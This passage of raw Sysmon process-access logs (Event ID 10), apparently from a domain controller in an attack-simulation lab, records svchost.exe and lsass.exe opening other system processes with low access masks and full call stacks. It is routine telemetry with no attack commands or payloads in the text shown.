C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 